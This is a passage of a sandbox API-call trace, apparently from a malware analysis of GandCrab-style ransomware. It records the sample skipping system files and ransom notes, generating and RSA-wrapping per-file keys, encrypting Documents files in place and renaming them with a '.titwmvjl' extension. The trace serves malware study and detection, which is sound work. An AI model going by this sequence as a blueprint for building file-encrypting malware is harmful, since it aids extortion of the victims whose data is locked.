(lpString="C:\\Users\\CIiHmnxMn6Ps\\Documents\\9BBF2RyCvM\\uXcvp3mK09d\\3M1hZqKtYrnXF.ots") returned 72 [0089.797] VirtualAlloc (lpAddress=0x0, dwSize=0xd0, flAllocationType=0x3000, flProtect=0x4) returned 0x1e70000 [0089.797] wsprintfW (in: param_1=0x1e70000, param_2="%s%s" | out: param_1="C:\\Users\\CIiHmnxMn6Ps\\Documents\\9BBF2RyCvM\\uXcvp3mK09d\\3M1hZqKtYrnXF.ots.titwmvjl") returned 81 [0089.797] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\Documents\\9BBF2RyCvM\\uXcvp3mK09d\\3M1hZqKtYrnXF.ots") returned 72 [0089.797] lstrlenW (lpString=".ots") returned 4 [0089.797] VirtualAlloc (lpAddress=0x0, dwSize=0xc, flAllocationType=0x3000, flProtect=0x4) returned 0x2410000 [0089.797] wsprintfW (in: param_1=0x2410000, param_2="%ws " | out: param_1=".ots ") returned 5 [0089.797] lstrcmpiW (lpString1=".ots", lpString2=".titwmvjl") returned -1 [0089.797] VirtualFree (lpAddress=0x2410000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0089.798] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\Documents\\9BBF2RyCvM\\uXcvp3mK09d\\3M1hZqKtYrnXF.ots") returned 72 [0089.798] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\Documents\\9BBF2RyCvM\\uXcvp3mK09d\\3M1hZqKtYrnXF.ots") returned 72 [0089.798] lstrcmpiW (lpString1="3M1hZqKtYrnXF.ots", lpString2="desktop.ini") returned -1 [0089.798] lstrcmpiW (lpString1="3M1hZqKtYrnXF.ots", lpString2="autorun.inf") returned -1 [0089.798] lstrcmpiW (lpString1="3M1hZqKtYrnXF.ots", lpString2="ntuser.dat") returned -1 [0089.798] lstrcmpiW (lpString1="3M1hZqKtYrnXF.ots", lpString2="iconcache.db") returned -1 [0089.798] lstrcmpiW (lpString1="3M1hZqKtYrnXF.ots", lpString2="bootsect.bak") returned -1 [0089.798] lstrcmpiW (lpString1="3M1hZqKtYrnXF.ots", lpString2="boot.ini") returned -1 [0089.798] lstrcmpiW (lpString1="3M1hZqKtYrnXF.ots", lpString2="ntuser.dat.log") returned -1 [0089.798] lstrcmpiW (lpString1="3M1hZqKtYrnXF.ots", lpString2="thumbs.db") returned -1 [0089.798] lstrcmpiW (lpString1="3M1hZqKtYrnXF.ots", lpString2="TITWMVJL-DECRYPT.txt") returned -1 [0089.798] lstrcmpiW (lpString1="3M1hZqKtYrnXF.ots", lpString2="TITWMVJL-DECRYPT.html") returned -1 [0089.798] lstrcmpiW (lpString1="3M1hZqKtYrnXF.ots", lpString2="KRAB-DECRYPT.html") returned -1 [0089.798] lstrcmpiW (lpString1="3M1hZqKtYrnXF.ots", lpString2="CRAB-DECRYPT.html") returned -1 [0089.798] lstrcmpiW (lpString1="3M1hZqKtYrnXF.ots", lpString2="KRAB-DECRYPT.txt") returned -1 [0089.798] lstrcmpiW (lpString1="3M1hZqKtYrnXF.ots", lpString2="CRAB-DECRYPT.txt") returned -1 [0089.798] lstrcmpiW (lpString1="3M1hZqKtYrnXF.ots", lpString2="ntldr") returned -1 [0089.798] lstrcmpiW (lpString1="3M1hZqKtYrnXF.ots", lpString2="NTDETECT.COM") returned -1 [0089.798] lstrcmpiW (lpString1="3M1hZqKtYrnXF.ots", lpString2="Bootfont.bin") returned -1 [0089.798] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\Documents\\9BBF2RyCvM\\uXcvp3mK09d\\3M1hZqKtYrnXF.ots") returned 72 [0089.798] lstrlenW (lpString=".ots") returned 4 [0089.798] VirtualAlloc (lpAddress=0x0, dwSize=0xc, flAllocationType=0x3000, flProtect=0x4) returned 0x2410000 [0089.798] wsprintfW (in: param_1=0x2410000, param_2="%s " | out: param_1=".ots ") returned 5 [0089.798] VirtualFree (lpAddress=0x2410000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0089.798] VirtualAlloc (lpAddress=0x0, dwSize=0x21c, flAllocationType=0x3000, flProtect=0x4) returned 0x2410000 [0089.799] CreateFileW (lpFileName="C:\\Users\\CIiHmnxMn6Ps\\Documents\\9BBF2RyCvM\\uXcvp3mK09d\\3M1hZqKtYrnXF.ots" (normalized: "c:\\users\\ciihmnxmn6ps\\documents\\9bbf2rycvm\\uxcvp3mk09d\\3m1hzqktyrnxf.ots"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x88000000, hTemplateFile=0x0) returned 0x2bc [0089.799] SetFilePointerEx (in: hFile=0x2bc, liDistanceToMove=0xfffffde4, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0089.799] ReadFile (in: hFile=0x2bc, lpBuffer=0x2410000, nNumberOfBytesToRead=0x21c, lpNumberOfBytesRead=0x259ef48, lpOverlapped=0x0 | out: lpBuffer=0x2410000*, lpNumberOfBytesRead=0x259ef48*=0x21c, lpOverlapped=0x0) returned 1 [0089.799] SetFilePointerEx (in: hFile=0x2bc, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0089.800] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0089.800] CryptAcquireContextW (in: phProv=0x259ee78, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x259ee78*=0x4c9980) returned 1 [0089.801] VirtualAlloc (lpAddress=0x0, dwSize=0x21, flAllocationType=0x3000, flProtect=0x40) returned 0x2420000 [0089.801] GetModuleHandleA (lpModuleName="Advapi32.dll") returned 0x77550000 [0089.801] GetProcAddress (hModule=0x77550000, lpProcName="CryptGenRandom") returned 0x77570df0 [0089.801] CryptGenRandom (in: hProv=0x4c9980, dwLen=0x20, pbBuffer=0x259ef04 | out: pbBuffer=0x259ef04) returned 1 [0089.801] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0089.801] CryptReleaseContext (hProv=0x4c9980, dwFlags=0x0) returned 1 [0089.801] VirtualFree (lpAddress=0x2420000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0089.801] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0089.802] CryptAcquireContextW (in: phProv=0x259ee78, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x259ee78*=0x4c9980) returned 1 [0089.803] VirtualAlloc (lpAddress=0x0, dwSize=0x9, flAllocationType=0x3000, flProtect=0x40) returned 0x2420000 [0089.803] GetModuleHandleA (lpModuleName="Advapi32.dll") returned 0x77550000 [0089.803] GetProcAddress (hModule=0x77550000, lpProcName="CryptGenRandom") returned 0x77570df0 [0089.803] CryptGenRandom (in: hProv=0x4c9980, dwLen=0x8, pbBuffer=0x259ef24 | out: pbBuffer=0x259ef24) returned 1 [0089.803] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0089.803] CryptReleaseContext (hProv=0x4c9980, dwFlags=0x0) returned 1 [0089.803] VirtualFree (lpAddress=0x2420000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0089.803] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0089.804] CryptAcquireContextW (in: phProv=0x259ee6c, szContainer=0x0, szProvider="Microsoft Enhanced Cryptographic Provider v1.0", dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x259ee6c*=0x4c9980) returned 1 [0089.805] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0089.805] CryptImportKey (in: hProv=0x4c9980, pbData=0x1e40000, dwDataLen=0x114, hPubKey=0x0, dwFlags=0x0, phKey=0x259ee70 | out: phKey=0x259ee70*=0x503738) returned 1 [0089.805] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0089.805] CryptGetKeyParam (in: hKey=0x503738, dwParam=0x8, pbData=0x259ee64, pdwDataLen=0x259ee68, dwFlags=0x0 | out: pbData=0x259ee64*=0x800, pdwDataLen=0x259ee68*=0x4) returned 1 [0089.805] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0089.805] CryptEncrypt (in: hKey=0x503738, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x2410000*, pdwDataLen=0x259ee9c*=0xc8, dwBufLen=0x100 | out: pbData=0x2410000*, pdwDataLen=0x259ee9c*=0x100) returned 1 [0089.805] GetLastError () returned 0x0 [0089.805] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0089.805] CryptDestroyKey (hKey=0x503738) returned 1 [0089.805] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0089.806] CryptReleaseContext (hProv=0x4c9980, dwFlags=0x0) returned 1 [0089.806] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0089.806] CryptAcquireContextW (in: phProv=0x259ee6c, szContainer=0x0, szProvider="Microsoft Enhanced Cryptographic Provider v1.0", dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x259ee6c*=0x4c9980) returned 1 [0089.807] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0089.807] CryptImportKey (in: hProv=0x4c9980, pbData=0x1e40000, dwDataLen=0x114, hPubKey=0x0, dwFlags=0x0, phKey=0x259ee70 | out: phKey=0x259ee70*=0x5037f8) returned 1 [0089.807] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0089.807] CryptGetKeyParam (in: hKey=0x5037f8, dwParam=0x8, pbData=0x259ee64, pdwDataLen=0x259ee68, dwFlags=0x0 | out: pbData=0x259ee64*=0x800, pdwDataLen=0x259ee68*=0x4) returned 1 [0089.807] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0089.807] CryptEncrypt (in: hKey=0x5037f8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x2410100*, pdwDataLen=0x259ee9c*=0xc8, dwBufLen=0x100 | out: pbData=0x2410100*, pdwDataLen=0x259ee9c*=0x100) returned 1 [0089.808] GetLastError () returned 0x0 [0089.808] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0089.808] CryptDestroyKey (hKey=0x5037f8) returned 1 [0089.808] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0089.808] CryptReleaseContext (hProv=0x4c9980, dwFlags=0x0) returned 1 [0089.808] VirtualAlloc (lpAddress=0x0, dwSize=0x100001, flAllocationType=0x3000, flProtect=0x4) returned 0x2650000 [0089.808] VirtualAlloc (lpAddress=0x0, dwSize=0x100005, flAllocationType=0x3000, flProtect=0x4) returned 0x2760000 [0089.808] ReadFile (in: hFile=0x2bc, lpBuffer=0x2650000, nNumberOfBytesToRead=0x100000, lpNumberOfBytesRead=0x259ef48, lpOverlapped=0x0 | out: lpBuffer=0x2650000*, lpNumberOfBytesRead=0x259ef48*=0x543, lpOverlapped=0x0) returned 1 [0089.814] SetFilePointerEx (in: hFile=0x2bc, liDistanceToMove=0xfffffabd, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0089.814] WriteFile (in: hFile=0x2bc, lpBuffer=0x2760000*, nNumberOfBytesToWrite=0x543, lpNumberOfBytesWritten=0x259ef2c, lpOverlapped=0x0 | out: lpBuffer=0x2760000*, lpNumberOfBytesWritten=0x259ef2c*=0x543, lpOverlapped=0x0) returned 1 [0089.815] SetFilePointerEx (in: hFile=0x2bc, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0089.815] WriteFile (in: hFile=0x2bc, lpBuffer=0x2410000*, nNumberOfBytesToWrite=0x21c, lpNumberOfBytesWritten=0x259ef2c, lpOverlapped=0x0 | out: lpBuffer=0x2410000*, lpNumberOfBytesWritten=0x259ef2c*=0x21c, lpOverlapped=0x0) returned 1 [0089.816] VirtualFree (lpAddress=0x2650000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0089.820] VirtualFree (lpAddress=0x2760000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0089.820] VirtualFree (lpAddress=0x2410000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0089.820] CloseHandle (hObject=0x2bc) returned 1 [0089.821] MoveFileExW (lpExistingFileName="C:\\Users\\CIiHmnxMn6Ps\\Documents\\9BBF2RyCvM\\uXcvp3mK09d\\3M1hZqKtYrnXF.ots" (normalized: "c:\\users\\ciihmnxmn6ps\\documents\\9bbf2rycvm\\uxcvp3mk09d\\3m1hzqktyrnxf.ots"), lpNewFileName="C:\\Users\\CIiHmnxMn6Ps\\Documents\\9BBF2RyCvM\\uXcvp3mK09d\\3M1hZqKtYrnXF.ots.titwmvjl" (normalized: "c:\\users\\ciihmnxmn6ps\\documents\\9bbf2rycvm\\uxcvp3mk09d\\3m1hzqktyrnxf.ots.titwmvjl"), dwFlags=0x1) returned 1 [0089.822] VirtualFree (lpAddress=0x1e70000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0089.822] FindNextFileW (in: hFindFile=0x5035b8, lpFindFileData=0x259effc | out: lpFindFileData=0x259effc) returned 1 [0089.822] lstrcmpW (lpString1="3_9Haky2wfv1A.odt", lpString2=".") returned 1 [0089.822] lstrcmpW (lpString1="3_9Haky2wfv1A.odt", lpString2="..") returned 1 [0089.822] lstrcatW (in: lpString1="C:\\Users\\CIiHmnxMn6Ps\\Documents\\9BBF2RyCvM\\uXcvp3mK09d\\", lpString2="3_9Haky2wfv1A.odt" | out: lpString1="C:\\Users\\CIiHmnxMn6Ps\\Documents\\9BBF2RyCvM\\uXcvp3mK09d\\3_9Haky2wfv1A.odt") returned="C:\\Users\\CIiHmnxMn6Ps\\Documents\\9BBF2RyCvM\\uXcvp3mK09d\\3_9Haky2wfv1A.odt" [0089.822] lstrlenW (lpString=".titwmvjl") returned 9 [0089.822] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\Documents\\9BBF2RyCvM\\uXcvp3mK09d\\3_9Haky2wfv1A.odt") returned 72 [0089.822] VirtualAlloc (lpAddress=0x0, dwSize=0xd0, flAllocationType=0x3000, flProtect=0x4) returned 0x1e70000 [0089.822] wsprintfW (in: param_1=0x1e70000, param_2="%s%s" | out: param_1="C:\\Users\\CIiHmnxMn6Ps\\Documents\\9BBF2RyCvM\\uXcvp3mK09d\\3_9Haky2wfv1A.odt.titwmvjl") returned 81 [0089.822] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\Documents\\9BBF2RyCvM\\uXcvp3mK09d\\3_9Haky2wfv1A.odt") returned 72 [0089.822] lstrlenW (lpString=".odt") returned 4 [0089.822] VirtualAlloc (lpAddress=0x0, dwSize=0xc, flAllocationType=0x3000, flProtect=0x4) returned 0x2410000 [0089.822] wsprintfW (in: param_1=0x2410000, param_2="%ws " | out: param_1=".odt ") returned 5 [0089.822] lstrcmpiW (lpString1=".odt", lpString2=".titwmvjl") returned -1 [0089.822] VirtualFree (lpAddress=0x2410000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0089.823] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\Documents\\9BBF2RyCvM\\uXcvp3mK09d\\3_9Haky2wfv1A.odt") returned 72 [0089.823] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\Documents\\9BBF2RyCvM\\uXcvp3mK09d\\3_9Haky2wfv1A.odt") returned 72 [0089.823] lstrcmpiW (lpString1="3_9Haky2wfv1A.odt", lpString2="desktop.ini") returned -1 [0089.823] lstrcmpiW (lpString1="3_9Haky2wfv1A.odt", lpString2="autorun.inf") returned -1 [0089.823] lstrcmpiW (lpString1="3_9Haky2wfv1A.odt", lpString2="ntuser.dat") returned -1 [0089.823] lstrcmpiW (lpString1="3_9Haky2wfv1A.odt", lpString2="iconcache.db") returned -1 [0089.823] lstrcmpiW (lpString1="3_9Haky2wfv1A.odt", lpString2="bootsect.bak") returned -1 [0089.823] lstrcmpiW (lpString1="3_9Haky2wfv1A.odt", lpString2="boot.ini") returned -1 [0089.823] lstrcmpiW (lpString1="3_9Haky2wfv1A.odt", lpString2="ntuser.dat.log") returned -1 [0089.823] lstrcmpiW (lpString1="3_9Haky2wfv1A.odt", lpString2="thumbs.db") returned -1 [0089.823] lstrcmpiW (lpString1="3_9Haky2wfv1A.odt", lpString2="TITWMVJL-DECRYPT.txt") returned -1 [0089.823] lstrcmpiW (lpString1="3_9Haky2wfv1A.odt", lpString2="TITWMVJL-DECRYPT.html") returned -1 [0089.823] lstrcmpiW (lpString1="3_9Haky2wfv1A.odt", lpString2="KRAB-DECRYPT.html") returned -1 [0089.823] lstrcmpiW (lpString1="3_9Haky2wfv1A.odt", lpString2="CRAB-DECRYPT.html") returned -1 [0089.823] lstrcmpiW (lpString1="3_9Haky2wfv1A.odt", lpString2="KRAB-DECRYPT.txt") returned -1 [0089.823] lstrcmpiW (lpString1="3_9Haky2wfv1A.odt", lpString2="CRAB-DECRYPT.txt") returned -1 [0089.823] lstrcmpiW (lpString1="3_9Haky2wfv1A.odt", lpString2="ntldr") returned -1 [0089.823] lstrcmpiW (lpString1="3_9Haky2wfv1A.odt", lpString2="NTDETECT.COM") returned -1 [0089.823] lstrcmpiW (lpString1="3_9Haky2wfv1A.odt", lpString2="Bootfont.bin") returned -1 [0089.823] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\Documents\\9BBF2RyCvM\\uXcvp3mK09d\\3_9Haky2wfv1A.odt") returned 72 [0089.823] lstrlenW (lpString=".odt") returned 4 [0089.823] VirtualAlloc (lpAddress=0x0, dwSize=0xc, flAllocationType=0x3000, flProtect=0x4) returned 0x2410000 [0089.823] wsprintfW (in: param_1=0x2410000, param_2="%s " | out: param_1=".odt ") returned 5 [0089.823] VirtualFree (lpAddress=0x2410000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0089.823] VirtualAlloc (lpAddress=0x0, dwSize=0x21c, flAllocationType=0x3000, flProtect=0x4) returned 0x2410000 [0089.824] CreateFileW (lpFileName="C:\\Users\\CIiHmnxMn6Ps\\Documents\\9BBF2RyCvM\\uXcvp3mK09d\\3_9Haky2wfv1A.odt" (normalized: "c:\\users\\ciihmnxmn6ps\\documents\\9bbf2rycvm\\uxcvp3mk09d\\3_9haky2wfv1a.odt"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x88000000, hTemplateFile=0x0) returned 0x2bc [0089.824] SetFilePointerEx (in: hFile=0x2bc, liDistanceToMove=0xfffffde4, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0089.824] ReadFile (in: hFile=0x2bc, lpBuffer=0x2410000, nNumberOfBytesToRead=0x21c, lpNumberOfBytesRead=0x259ef48, lpOverlapped=0x0 | out: lpBuffer=0x2410000*, lpNumberOfBytesRead=0x259ef48*=0x21c, lpOverlapped=0x0) returned 1 [0089.825] SetFilePointerEx (in: hFile=0x2bc, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0089.825] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0089.825] CryptAcquireContextW (in: phProv=0x259ee78, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x259ee78*=0x4c9980) returned 1 [0089.826] VirtualAlloc (lpAddress=0x0, dwSize=0x21, flAllocationType=0x3000, flProtect=0x40) returned 0x2420000 [0089.826] GetModuleHandleA (lpModuleName="Advapi32.dll") returned 0x77550000 [0089.826] GetProcAddress (hModule=0x77550000, lpProcName="CryptGenRandom") returned 0x77570df0 [0089.826] CryptGenRandom (in: hProv=0x4c9980, dwLen=0x20, pbBuffer=0x259ef04 | out: pbBuffer=0x259ef04) returned 1 [0089.826] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0089.827] CryptReleaseContext (hProv=0x4c9980, dwFlags=0x0) returned 1 [0089.827] VirtualFree (lpAddress=0x2420000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0089.827] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0089.827] CryptAcquireContextW (in: phProv=0x259ee78, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x259ee78*=0x4c9980) returned 1 [0089.828] VirtualAlloc (lpAddress=0x0, dwSize=0x9, flAllocationType=0x3000, flProtect=0x40) returned 0x2420000 [0089.828] GetModuleHandleA (lpModuleName="Advapi32.dll") returned 0x77550000 [0089.828] GetProcAddress (hModule=0x77550000, lpProcName="CryptGenRandom") returned 0x77570df0 [0089.828] CryptGenRandom (in: hProv=0x4c9980, dwLen=0x8, pbBuffer=0x259ef24 | out: pbBuffer=0x259ef24) returned 1 [0089.828] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0089.828] CryptReleaseContext (hProv=0x4c9980, dwFlags=0x0) returned 1 [0089.828] VirtualFree (lpAddress=0x2420000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0089.829] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0089.829] CryptAcquireContextW (in: phProv=0x259ee6c, szContainer=0x0, szProvider="Microsoft Enhanced Cryptographic Provider v1.0", dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x259ee6c*=0x4c9980) returned 1 [0089.830] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0089.830] CryptImportKey (in: hProv=0x4c9980, pbData=0x1e40000, dwDataLen=0x114, hPubKey=0x0, dwFlags=0x0, phKey=0x259ee70 | out: phKey=0x259ee70*=0x503338) returned 1 [0089.830] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0089.830] CryptGetKeyParam (in: hKey=0x503338, dwParam=0x8, pbData=0x259ee64, pdwDataLen=0x259ee68, dwFlags=0x0 | out: pbData=0x259ee64*=0x800, pdwDataLen=0x259ee68*=0x4) returned 1 [0089.830] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0089.830] CryptEncrypt (in: hKey=0x503338, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x2410000*, pdwDataLen=0x259ee9c*=0xc8, dwBufLen=0x100 | out: pbData=0x2410000*, pdwDataLen=0x259ee9c*=0x100) returned 1 [0089.830] GetLastError () returned 0x0 [0089.830] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0089.831] CryptDestroyKey (hKey=0x503338) returned 1 [0089.831] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0089.831] CryptReleaseContext (hProv=0x4c9980, dwFlags=0x0) returned 1 [0089.831] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0089.831] CryptAcquireContextW (in: phProv=0x259ee6c, szContainer=0x0, szProvider="Microsoft Enhanced Cryptographic Provider v1.0", dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x259ee6c*=0x4c9980) returned 1 [0089.832] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0089.832] CryptImportKey (in: hProv=0x4c9980, pbData=0x1e40000, dwDataLen=0x114, hPubKey=0x0, dwFlags=0x0, phKey=0x259ee70 | out: phKey=0x259ee70*=0x503378) returned 1 [0089.832] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0089.832] CryptGetKeyParam (in: hKey=0x503378, dwParam=0x8, pbData=0x259ee64, pdwDataLen=0x259ee68, dwFlags=0x0 | out: pbData=0x259ee64*=0x800, pdwDataLen=0x259ee68*=0x4) returned 1 [0089.832] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0089.832] CryptEncrypt (in: hKey=0x503378, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x2410100*, pdwDataLen=0x259ee9c*=0xc8, dwBufLen=0x100 | out: pbData=0x2410100*, pdwDataLen=0x259ee9c*=0x100) returned 1 [0089.833] GetLastError () returned 0x0 [0089.833] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0089.833] CryptDestroyKey (hKey=0x503378) returned 1 [0089.833] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0089.833] CryptReleaseContext (hProv=0x4c9980, dwFlags=0x0) returned 1 [0089.833] VirtualAlloc (lpAddress=0x0, dwSize=0x100001, flAllocationType=0x3000, flProtect=0x4) returned 0x2650000 [0089.833] VirtualAlloc (lpAddress=0x0, dwSize=0x100005, flAllocationType=0x3000, flProtect=0x4) returned 0x2760000 [0089.833] ReadFile (in: hFile=0x2bc, lpBuffer=0x2650000, nNumberOfBytesToRead=0x100000, lpNumberOfBytesRead=0x259ef48, lpOverlapped=0x0 | out: lpBuffer=0x2650000*, lpNumberOfBytesRead=0x259ef48*=0x10ad3, lpOverlapped=0x0) returned 1 [0089.840] SetFilePointerEx (in: hFile=0x2bc, liDistanceToMove=0xfffef52d, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0089.840] WriteFile (in: hFile=0x2bc, lpBuffer=0x2760000*, nNumberOfBytesToWrite=0x10ad3, lpNumberOfBytesWritten=0x259ef2c, lpOverlapped=0x0 | out: lpBuffer=0x2760000*, lpNumberOfBytesWritten=0x259ef2c*=0x10ad3, lpOverlapped=0x0) returned 1 [0089.841] WriteFile (in: hFile=0x2bc, lpBuffer=0x2410000*, nNumberOfBytesToWrite=0x21c, lpNumberOfBytesWritten=0x259ef2c, lpOverlapped=0x0 | out: lpBuffer=0x2410000*, lpNumberOfBytesWritten=0x259ef2c*=0x21c, lpOverlapped=0x0) returned 1 [0089.842] VirtualFree (lpAddress=0x2650000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0089.846] VirtualFree (lpAddress=0x2760000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0089.846] VirtualFree (lpAddress=0x2410000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0089.846] CloseHandle (hObject=0x2bc) returned 1 [0089.847] MoveFileExW (lpExistingFileName="C:\\Users\\CIiHmnxMn6Ps\\Documents\\9BBF2RyCvM\\uXcvp3mK09d\\3_9Haky2wfv1A.odt" (normalized: "c:\\users\\ciihmnxmn6ps\\documents\\9bbf2rycvm\\uxcvp3mk09d\\3_9haky2wfv1a.odt"), lpNewFileName="C:\\Users\\CIiHmnxMn6Ps\\Documents\\9BBF2RyCvM\\uXcvp3mK09d\\3_9Haky2wfv1A.odt.titwmvjl" (normalized: "c:\\users\\ciihmnxmn6ps\\documents\\9bbf2rycvm\\uxcvp3mk09d\\3_9haky2wfv1a.odt.titwmvjl"), dwFlags=0x1) returned 1 [0089.847] VirtualFree (lpAddress=0x1e70000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0089.848] FindNextFileW (in: hFindFile=0x5035b8, lpFindFileData=0x259effc | out: lpFindFileData=0x259effc) returned 1 [0089.848] lstrcmpW (lpString1="8K_dM0xOUIdny.docx", lpString2=".") returned 1 [0089.848] lstrcmpW (lpString1="8K_dM0xOUIdny.docx", lpString2="..") returned 1 [0089.848] lstrcatW (in: lpString1="C:\\Users\\CIiHmnxMn6Ps\\Documents\\9BBF2RyCvM\\uXcvp3mK09d\\", lpString2="8K_dM0xOUIdny.docx" | out: lpString1="C:\\Users\\CIiHmnxMn6Ps\\Documents\\9BBF2RyCvM\\uXcvp3mK09d\\8K_dM0xOUIdny.docx") returned="C:\\Users\\CIiHmnxMn6Ps\\Documents\\9BBF2RyCvM\\uXcvp3mK09d\\8K_dM0xOUIdny.docx" [0089.848] lstrlenW (lpString=".titwmvjl") returned 9 [0089.848] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\Documents\\9BBF2RyCvM\\uXcvp3mK09d\\8K_dM0xOUIdny.docx") returned 73 [0089.848] VirtualAlloc (lpAddress=0x0, dwSize=0xd2, flAllocationType=0x3000, flProtect=0x4) returned 0x1e70000 [0089.848] wsprintfW (in: param_1=0x1e70000, param_2="%s%s" | out: param_1="C:\\Users\\CIiHmnxMn6Ps\\Documents\\9BBF2RyCvM\\uXcvp3mK09d\\8K_dM0xOUIdny.docx.titwmvjl") returned 82 [0089.848] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\Documents\\9BBF2RyCvM\\uXcvp3mK09d\\8K_dM0xOUIdny.docx") returned 73 [0089.848] lstrlenW (lpString=".docx") returned 5 [0089.848] VirtualAlloc (lpAddress=0x0, dwSize=0xe, flAllocationType=0x3000, flProtect=0x4) returned 0x2410000 [0089.848] wsprintfW (in: param_1=0x2410000, param_2="%ws " | out: param_1=".docx ") returned 6 [0089.848] lstrcmpiW (lpString1=".docx", lpString2=".titwmvjl") returned -1 [0089.848] VirtualFree (lpAddress=0x2410000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0089.848] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\Documents\\9BBF2RyCvM\\uXcvp3mK09d\\8K_dM0xOUIdny.docx") returned 73 [0089.848] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\Documents\\9BBF2RyCvM\\uXcvp3mK09d\\8K_dM0xOUIdny.docx") returned 73 [0089.849] lstrcmpiW (lpString1="8K_dM0xOUIdny.docx", lpString2="desktop.ini") returned -1 [0089.849] lstrcmpiW (lpString1="8K_dM0xOUIdny.docx", lpString2="autorun.inf") returned -1 [0089.849] lstrcmpiW (lpString1="8K_dM0xOUIdny.docx", lpString2="ntuser.dat") returned -1 [0089.849] lstrcmpiW 